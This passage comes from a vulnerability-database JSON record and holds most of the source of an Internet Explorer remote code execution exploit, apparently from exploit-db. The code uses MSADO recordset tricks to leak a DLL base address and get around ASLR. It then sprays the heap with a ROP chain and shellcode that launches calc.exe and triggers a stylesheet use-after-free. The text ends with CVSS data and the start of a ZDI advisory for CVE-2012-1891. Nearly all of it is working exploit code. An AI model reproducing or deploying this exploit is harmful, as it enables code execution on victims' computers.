ataField1MustBeLongMyDataField1M
ustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong\"], [\"cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc\"]); \r\n\r\n var localxmlid4 = document.getElementById('xmlid4').recordset; \r\n\r\n localxmlid4.AddNew([\"bb\"], [\"c\"]); \r\n\r\n localxmlid4.MoveNext(); \r\n \r\n \r\n var localxmlid6 = document.getElementById('xmlid6').recordset; \r\n localxmlid6.AddNew([\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\"], [\"c\"]); \r\n \r\n localxmlid2.MoveFirst();\r\n \r\n Math.tan(1);\r\n \r\n document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';\r\n if(GlobalRowCounter < 0x10120) {\r\n \twindow.setTimeout(IncreaseRowCounter, 100);\r\n }\r\n}\r\n\r\n\r\nfunction IncreaseRowCounter() {\r\n\t//alert('IncreaseRowCounter: ' + GlobalRowCounter)\r\n\tif(GlobalRowCounter < 0x10120) {\t\t\r\n \tfor(i = 0; i < 0x300; i++) { \t\t\r\n \t\tGlobalRowCounter++;\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.Delete();\r\n }\r\n var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);\r\n document.getElementById('progressfaseone').innerText = percentcomplete + \"%\";\r\n window.setTimeout(IncreaseRowCounter, 100);\r\n }\r\n else {\r\n \tdocument.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. 
Please wait...';\r\n \twindow.setTimeout(FindADOBase, 100);\r\n }\r\n}\r\n\r\nfunction FindADOBase() {\r\n\t//alert('FindADOBase');\r\n \r\n \t\r\n var myfield = localxmlid3.Fields.Item(1);\r\n\r\n \tfor(i = 0; i < 0xDF6; i++) {\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.MoveFirst();\r\n if(myfield.Name != \"MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLon
gMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong\") {\r\n \tbreak;\r\n }\r\n }\r\n //alert('done first');\r\n\r\n void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));\r\n \r\n var vftable1 = null;\r\n var vftable2 = null;\r\n \r\n \tfor(i = 0; i < 0xAE0; i++) {\r\n \t\tvoid(Math.atan2(0xbabe, ('add row: ' + i).toString()));\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.MoveFirst();\r\n //if(i > 10) {\r\n // document.forms[0].myresult.value += i.toString(16) + \" : \" + escape(myfield.name.substr((2 * i) + 4, 8)) + \" : \" + myfield.name.length + \"\\n\";\r\n //}\r\n if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {\r\n \tvftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\\w\\w\\w\\w)%u(\\w\\w\\w\\w)/, \"$2$1\");\r\n } \r\n if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {\r\n \tvftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\\w\\w\\w\\w)%u(\\w\\w\\w\\w)/, \"$2$1\");\r\n } \r\n if(vftable1 && vftable2) {\r\n \tbreak;\r\n }\r\n }\r\n //document.forms[0].myresult.value += \"\\n\\nVFTABLES: \" + vftable1 + \" : \" + vftable2 + \"\\n\\n\\n\";\r\n //alert(vftable1);\r\n if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) { \t \r\n \t adobase = parseInt(vftable1,16) - 0x1AD68;\r\n \t document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);\r\n \t FaseTwo();\r\n }\r\n else {\r\n alert('sadly we failed to read the base address of msado15.dll :( ');\t\r\n }\r\n \r\n} \r\n\r\nfunction FaseTwo() {\t\r\n\tdocument.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';\r\n\tdocument.getElementById('progressfasetwo').innerText = '0%';\r\n heap = new heapLib.ie(0x20000);\r\n\r\n \r\n var heapspray = 
unescape(\"%u2020%u1604%u0102%u0103%u0104%u0105\" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + \"%u010A%u010B\" + MakeAddressString(adobase + 0x4270B) + \"%u010E%u010F%u0110%u0111%u0112%u0113\" + \"%u2100%u1604\" + \"%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123\" + MakeAddressString(adobase) + \"%u0126%u0127%u0128%u0129%u012A%u012B\" + \"%u2024%u1604\" + \"%u012E%u012F%u0130%u0131%u0132%u0133\" + \"%u0040%u0000\" + \"%u0136%u0137\" + MakeAddressString(adobase + 0x1B1F0) + \"%u013A%u013B\" + \"%u0200%u0000\" + \"%u013E%u013F\" + \"%u2030%u1604\" + \"%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F\" + \r\n \"%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0\" + \"%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF\" + \r\n \"%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000\" + \"%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF\" + \"%u20A0%u1604\" + 
\"%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF\");\r\n //\"%u6163%u636C%u652D%u6578%u0000\r\n //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578\r\n //c:\\windows\\system32\\calc.exe\r\n //%63%61%6C%63%2E%65%78%65\r\n //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65 \r\n \r\n //var heapspray = unescape(\"%u2020%u1604%u0102%u0103%u0104%u0105\" + 
MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + \"%u010A%u010B\" + MakeAddressString(adobase + 0x4270B) + \"%u010E%u010F%u0110%u0111%u0112%u0113\" + \"%u2100%u1604\" + \"%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B\" + \"%u2024%u1604\" + \"%u012E%u012F%u0130%u0131%u0132%u0133\" + \"%u0040%u0000\" + \"%u0136%u0137\" + MakeAddressString(adobase + 0x1B1F0) + \"%u013A%u013B\" + \"%u0200%u0000\" + \"%u013E%u013F\" + \"%u2030%u1604\" + \"%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF\" + \"%u20A0%u1604\" + 
\"%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF\");\r\n\r\n while(heapspray.length < 0x200) heapspray += unescape(\"%u4444\");\r\n\r\n var heapblock = heapspray;\r\n while(heapblock.length < 0x40000) heapblock += heapblock;\r\n finalspray = heapblock.substring(2, 0x40000 - 0x21);\r\n\r\n //alert('Base address of ado15.dll ' + adobase.toString(16));\r\n if(CurrentHeapSpraySize < 900) {\r\n \twindow.setTimeout(SprayHeap, 
100);\r\n }\r\n else {\r\n \tRunExploit();\r\n }\r\n}\r\n\r\nfunction SprayHeap() {\r\n if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {\r\n for(var i = 0; i < 90; i++) {\r\n heap.alloc(finalspray);\r\n CurrentHeapSpraySize++;\r\n }\r\n var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);\r\n document.getElementById('progressfasetwo').innerText = percentcomplete + \"%\"; \r\n window.setTimeout(SprayHeap, 100);\r\n } \r\n\telse {\r\n\t\tdocument.getElementById('textfasetwodone').innerText = \"Ready to start calc.exe in: \"; \r\n\t\twindow.setTimeout(RunExploitTimer, 100);\r\n\t}\r\n\t\r\n}\r\n\r\nfunction RunExploitTimer() {\r\n\tif(ExpoitTime > 0) {\r\n\t\tdocument.getElementById('countexploitrun').innerText = ExpoitTime;\r\n\t\twindow.setTimeout(RunExploitTimer, 500);\r\n\t\tExpoitTime--;\r\n\t}\r\n\telse {\r\n\t\tdocument.getElementById('countexploitrun').innerText = 0;\t\r\n\t\tvar EndTime = new Date();\r\n\t var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);\r\n\t document.getElementById('totalruntime').innerText = \"Total exploitation time: \" + TotalRun + \" seconds\"; \t\r\n\t\twindow.setTimeout(RunExploit, 100);\r\n\t}\r\n}\r\n \r\nfunction RunExploit() {\r\n \r\n var elms = new Array();\r\n for(i =0; i < 100; i++) {\r\n\t elms.push(document.createElement('div'));\r\n }\r\n\r\n owningObj = document.styleSheets[0].owningElement; \r\n\r\n myimports = document.styleSheets[0].imports;\r\n\r\n document.appendChild(owningObj);\r\n document.removeChild(owningObj);\r\n\r\n owningObj.outerHTML = 'a';\r\n\r\n Math.atan2(0xbabe, \"Collect\");\r\n CollectGarbage();\r\n\r\n Math.atan2(0xbabe, \"spray\");\r\n for(i = 0; i < 100; i++) {\r\n \telms[i].className = unescape(\"%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b\");\r\n } \r\n\r\n Result = owningObj.insertAdjacentElement(myimports,'a');\r\n 
\r\n\t\r\n} \r\n\r\nfunction MakeAddressString(addrint) {\r\n\t//First, turn into hex:\r\n\tvar addstr = addrint.toString(16);\r\n\t//Split and swap\r\n\taddstr = addstr.replace(/(\\w\\w\\w\\w)(\\w\\w\\w\\w)/,\"%u$2%u$1\");\r\n\treturn addstr;\r\n}\r\n \r\n </script>\r\n\r\n </head>\r\n <body onLoad=\"window.setTimeout(Start,100);\" id=\"bodyid\">\r\n <div>\r\n \t<h2 id=\"textfaseone\"></h2>\r\n \t<br>\r\n <h2 id=\"progressfaseone\"></h2>\r\n <br>\r\n <h2 id=\"textfaseonedone\"></h2>\r\n <br>\r\n <h2 id=\"textfoundaddress\"></h2>\r\n <br>\r\n <h2 id=\"textfasetwo\"></h2>\r\n <br>\r\n <h2 id=\"progressfasetwo\"></h2>\r\n <br>\r\n <h2 id=\"textfasetwodone\"></h2>\r\n <br>\r\n <h2 id=\"countexploitrun\"></h2>\r\n <br>\r\n <h2 id=\"totalruntime\"></h2>\r\n </div>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid1\">\r\n<Devices>\r\n<Device>\r\n<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid2\">\r\n<Devices>\r\n<Device>\r\n<BBBB />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid3\">\r\n<root>\r\n<data>\r\n\t<SmallData>\r\n 
</SmallData>\r\n<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>\r\n\tvalue1\r\n</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyData
Field1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>\r\n</data>\r\n</root>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid4\">\r\n<Devices>\r\n<Device>\r\n<bb />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" 
standalone=\"yes\"?>\r\n<XML ID=\"xmlid5\">\r\n<Devices>\r\n<Device>\r\n<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid6\">\r\n<root>\r\n<data>\r\n<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>\r\n\tvalue2\r\n</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>\r\n</data>\r\n</root>\r\n</XML>\r\n\r\n </body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15984/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-158 : Microsoft Internet Explorer MSADO CacheSize Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-158\r\nAugust 22, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-1891\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\nMicrosoft\r\n\r\n- -- Affected 
